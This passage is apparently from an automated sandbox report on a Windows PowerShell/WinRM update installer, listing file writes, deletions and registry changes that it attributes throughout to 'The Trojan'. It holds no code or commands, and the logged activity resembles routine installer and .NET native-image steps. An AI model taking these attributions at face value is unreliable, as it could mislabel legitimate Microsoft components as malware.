%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (0 bytes)
%System%\winrmprov.mof (0 bytes)
%WinDir%\imsins.BAK (0 bytes)
%System%\SETB.tmp (0 bytes)
%System%\SET1F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (0 bytes)
%WinDir%\inf\oem10.inf (0 bytes)
%System%\SET28.tmp (0 bytes)
%System%\SET5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (0 bytes)
%System%\winrshost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (0 bytes)
%System%\SET31.tmp (0 bytes)
%WinDir%\inf\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\@.lnk (0 bytes)
%System%\WsmPty.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET29.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (0 bytes)
%System%\WsmRes.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (0 bytes)
%WinDir%\Temp\UPD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (0 bytes)
%System%\SET2C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\SET15.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (0 bytes)
%System%\wbem\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET24.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (0 bytes)
%System%\winrssrv.dll (0 bytes)
%WinDir%\inf\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (0 bytes)
%System%\winrm\0409\SET1D.tmp (0 bytes)
%System%\SETD.tmp (0 bytes)
%System%\SET10.tmp (0 bytes)
%WinDir%\inf\SET19.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (0 bytes)
%System%\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (0 bytes)
%System%\winrm\0409\SET37.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (0 bytes)
%System%\winrs.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (0 bytes)
%System%\SET2F.tmp (0 bytes)
%WinDir%\Help\SETC5.tmp (0 bytes)
%System%\WsmSvc.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (0 bytes)
%System%\winrsmgr.dll (0 bytes)
%System%\SET30.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (0 bytes)
%System%\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (0 bytes)
%System%\WsmTxt.xsl (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (0 bytes)
%WinDir%\inf\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
The process PSCustomSetupUtil.exe:2596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\J147ADHK\System.Management.Automation.dll (81046 bytes)
The process PSCustomSetupUtil.exe:2900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\M47ADGJM\Microsoft.BackgroundIntelligentTransfer.Management.dll (1856 bytes)
The process PSCustomSetupUtil.exe:3776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\G037ADGK\Microsoft.PowerShell.Editor.resources.dll (2392 bytes)
The process PSCustomSetupUtil.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CUX147AD\Microsoft.PowerShell.GraphicalHost.resources.dll (784 bytes)
The process PSCustomSetupUtil.exe:3164 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\N58BEHKN\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll (7 bytes)
The process PSCustomSetupUtil.exe:3008 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\S9DGJMPS\Microsoft.PowerShell.Commands.Management.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\1KNQTWZ2\Microsoft.PowerShell.GraphicalHost.dll (9608 bytes)
The process PSCustomSetupUtil.exe:3124 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\Q8BEHKNR\Microsoft.WSMan.Management.resources.dll (13 bytes)
The process PSCustomSetupUtil.exe:2744 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\J258BEHK\Microsoft.PowerShell.Security.dll (2392 bytes)
The process PSCustomSetupUtil.exe:2968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\FX0369DG\Microsoft.PowerShell.ConsoleHost.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3080 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\CUX036AD\Microsoft.PowerShell.Commands.Diagnostics.resources.dll (10 bytes)
The process PSCustomSetupUtil.exe:2620 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\5NQUX036\Microsoft.PowerShell.ConsoleHost.dll (7192 bytes)
The process PSCustomSetupUtil.exe:2768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\1LOSVY15\Microsoft.PowerShell.Commands.Diagnostics.dll (3616 bytes)
The process PSCustomSetupUtil.exe:2876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\HZ258BEI\Microsoft.WSMan.Management.dll (9608 bytes)
The process PSCustomSetupUtil.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\ZHKNQTX0\Microsoft.PowerShell.Commands.Utility.dll (20624 bytes)
The process PSCustomSetupUtil.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\8QTWZ258\System.Management.Automation.resources.dll (9320 bytes)
The process PSCustomSetupUtil.exe:3708 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\FZ258CFI\Microsoft.PowerShell.GPowerShell.dll (22192 bytes)
The process PSCustomSetupUtil.exe:3800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\P9CFILPS\Microsoft.PowerShell.GPowerShell.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\YGJMQTWZ\Microsoft.PowerShell.Security.resources.dll (9 bytes)
The process PSCustomSetupUtil.exe:2836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\SADGJNQT\Microsoft.WSMan.Runtime.dll (7 bytes)
The process PSCustomSetupUtil.exe:2680 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\L369CFIL\Microsoft.PowerShell.Commands.Management.dll (9320 bytes)
The process PSCustomSetupUtil.exe:3032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\WEHKNQTW\Microsoft.PowerShell.Commands.Utility.resources.dll (1552 bytes)
The process PSCustomSetupUtil.exe:3684 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\tmp\3MPSVZ25\Microsoft.PowerShell.Editor.dll (32824 bytes)
The process PSSetupNativeUtils.exe:4084 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
The process mscorsvw.exe:2596 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD6.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5d.dat (0 bytes)
The process mscorsvw.exe:3888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD8.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5f.dat (0 bytes)
The process mscorsvw.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5b.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD4.tmp (0 bytes)
The process mscorsvw.exe:2052 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDA.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index61.dat (0 bytes)
The process mscorsvw.exe:1612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD1.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index58.dat (0 bytes)
The process mscorsvw.exe:2248 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index62.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDB.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD3.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5a.dat (0 bytes)
The process mscorsvw.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD9.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index60.dat (0 bytes)
The process mscorsvw.exe:2504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5c.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD5.tmp (0 bytes)
The process mscorsvw.exe:2116 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD2.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index59.dat (0 bytes)
The process mscorsvw.exe:2428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp\System.Management.Automation.dll (105990 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\index63.dat (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPDC.tmp (0 bytes)
The process mscorsvw.exe:3400 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (83393 bytes)
The process mscorsvw.exe:3372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
The Trojan deletes the following file(s):
%WinDir%\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel# (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPD7.tmp (0 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\index5e.dat (0 bytes)
Registry activity
The process mofcomp.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 A7 19 66 A5 A5 DE 59 3F F4 63 BC 15 D4 35 8D"
The process WindowsXP-KB968930-x86-ENG.exe:176 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F A8 49 98 3A 87 16 F4 F6 47 D5 4E DB 71 EB DB"
The process ngen.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 D0 26 61 5B FA 59 4E 77 61 CF 85 44 28 1B B2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:3924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 4D E6 B9 A0 DC 0D 9A A3 1D B6 EC E4 BD 5F 5C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:3916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 34 59 66 E7 DE 02 6D C4 E4 18 09 B2 88 70 BC"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 17 F0 E8 CD 4F 17 0F FC E4 03 C8 F3 30 D9 27"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:3908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 D0 85 7D CD 42 AC 26 11 C7 BD 97 A3 85 7D 35"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3416 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 5F 34 B6 4B E4 06 A2 62 28 2C 1E B4 34 2C 3A"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 55 0F 97 B1 67 BA 25 0A B5 CD 00 BE CF FE 2E"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 7D 69 D4 FC 8C 66 05 34 FF 39 F5 99 F8 70 E5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:3552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 0E BE 08 9D 8C 6A BD 5A 1F B1 0F 1B D8 8C BC"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:3576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 1F BE 0D 67 F1 3A B8 C0 18 C0 87 52 EB EF C8"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
